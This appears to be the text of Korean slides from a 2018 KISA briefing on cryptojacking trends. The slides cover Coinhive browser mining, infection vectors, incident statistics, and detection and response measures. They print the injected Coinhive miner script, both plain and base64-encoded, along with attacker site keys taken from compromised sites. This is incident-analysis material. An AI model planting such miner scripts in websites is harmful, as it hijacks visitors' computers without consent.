2018 05-08 최근 크립토재킹 동향

2. Cryptojacking : Cryptocurrency(가상통화) + hijacking(하이재킹)
정의 : 해커가 그들의 대상이 되는 프로세스 자원을 빼앗아 해커 자신을
위한 가상통화 채굴 등을 하는 공격기법
* 크립토재킹 피해자들의 시스템(PC 등)은 가상통화 Miner(광산)가 되어 해커들을
위한 블록체인을 업데이트 하고 가상통화를 생산하여 해커의 지갑에 입금
과거 .. 악성코드 형태
최근 동향 .. 브라우져 마이닝

3. 악성코드
=> 브라우져용 스크립트 (다크웹에서 키트 판매, $30)
=> 임베이드 형태의 자바 스크립트 공개하는 업체 등장
Coinhive
- 설치형 채굴 마이너 배포 하던 회사
- 2017년 9월 자바스크립트 채굴 코드 발표 => 모네로

4. 2017년 하반기 부터
폭팔적 증가

5. 2017년 12월 부터 시작
2018년 1분기 증가
(KISA MCF 기준)
1~3월 235건 / 877건
1~4.25 247건 / 998건
coinhive
크립토 재킹
27%
그 외
73%
coinhive 크립토 재킹
그 외

6. <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('<site-key>',{
threads: 1
});
miner.start();
</script>

8. 1. 웹 변조를 통한 스크립트 삽입
2. WiFi 해킹을 통한 가상통화 채굴(커피마이너)
3. 유튜브 등 3rd 파티에 스크립트 삽입
4. 게임 광고 등에 대한 삽입

9. - listtype.php 에 includ하는 common.php의 LFI 취약점 악용
=> 그누보드 스킨 취약점
- 특정파일(wrest.js) 에 스크립트 삽입
- 악성스크립트 문구
PHNjcmlwdCBzcmM9Imh0dHBzOi8vY29pbmhpdmUuY29tL2xpYi9jb2lua
Gl2ZS5taW4uanMiPjwvc2NyaXB0Pgo8c2NyaXB0Pgp2YXIgbWluZXIgPS
BuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCd2dHlGckNuN25BRUprOElYR
E9IaWtsckRoSlNzTllBOScsIHt0aHJvdHRsZTogMC44fSk7Cm1pbmVyLn
N0YXJ0KCk7Cjwvc2NyaXB0Pg==
내부 침해사고 분석사례 : 소OOO(by 임OO), 기OOO(by 윤 OO)

10. <script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new
CoinHive.Anonymous('vtyFrCn7nAEJk8IXDOHiklrDhJSsNYA9',
{throttle: 0.8});
miner.start();
</script>
PHNjcmlwdCBzcmM9Imh0dHBzOi8vY29pbmhpdmUuY29tL2xpYi9jb
2luaGl2ZS5taW4uanMiPjwvc2NyaXB0Pgo8c2NyaXB0Pgp2YXIgbWl
uZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCd2dHlGckNuN25
BRUprOElYRE9IaWtsckRoSlNzTllBOScsIHt0aHJvdHRsZTogMC44f
Sk7Cm1pbmVyLnN0YXJ0KCk7Cjwvc2NyaXB0Pg==
base64

11. 해커A : TnKJQivLdI92CHM5VDumySeVWinv2yfL
4.25 기준
최소 1300개 이상

12. 해커 B : JoRGmFKFHpCfmPnn30uaAVCmIdrADfPd

13. 2018.05.03 기준
29,044개 웹 사이트

14. 1. 웹 변조를 통한 스크립트 삽입
2. WiFi 해킹을 통한 가상통화 채굴(커피마이너)
3. 유튜브 등 3rd 파티에 스크립트 삽입
4. 게임 광고 등에 대한 삽입

15. 2. MITM
1. Arp 스푸핑
3. Inject + http 서버
Coinhive script

16. 1. 웹 변조를 통한 스크립트 삽입
2. WiFi 해킹을 통한 가상통화 채굴(커피마이너)
3. 유튜브 등 3rd 스크립트 삽입
4. 게임 광고 등에 대한 삽입

19. 1. 기업
1) 탐지 패턴 제공
2. 개인
1) 백신에서 탐지 : 가장 확실한 방법
2) 개인에게 가이드
- 크롬 확장 프로그램 등, 윈도우 방화벽 차단 방법 등
3) Krcert 등을 통한 공지 및 안내
3. KISA 로써의 역할
1) (국내) 보고서 작성 및 배포
2) (해외) KrCert/CC 로써 국외 감염 IP 등
< IOC 글로벌 협력팀을 통해 배포 >
3) 향후 공격자 변경 방식 모니터링
http://new CRLT.Anonymous

20. 1. 현재 국내 백신에서는 탐지 하지 않음
2. 해외에서도 일부 백신만 탐지
최소 3개 백신에서 탐지
1) Avast
2) Norton
3) Malwarebytes

21. 3. JSEscrit 탐지 백신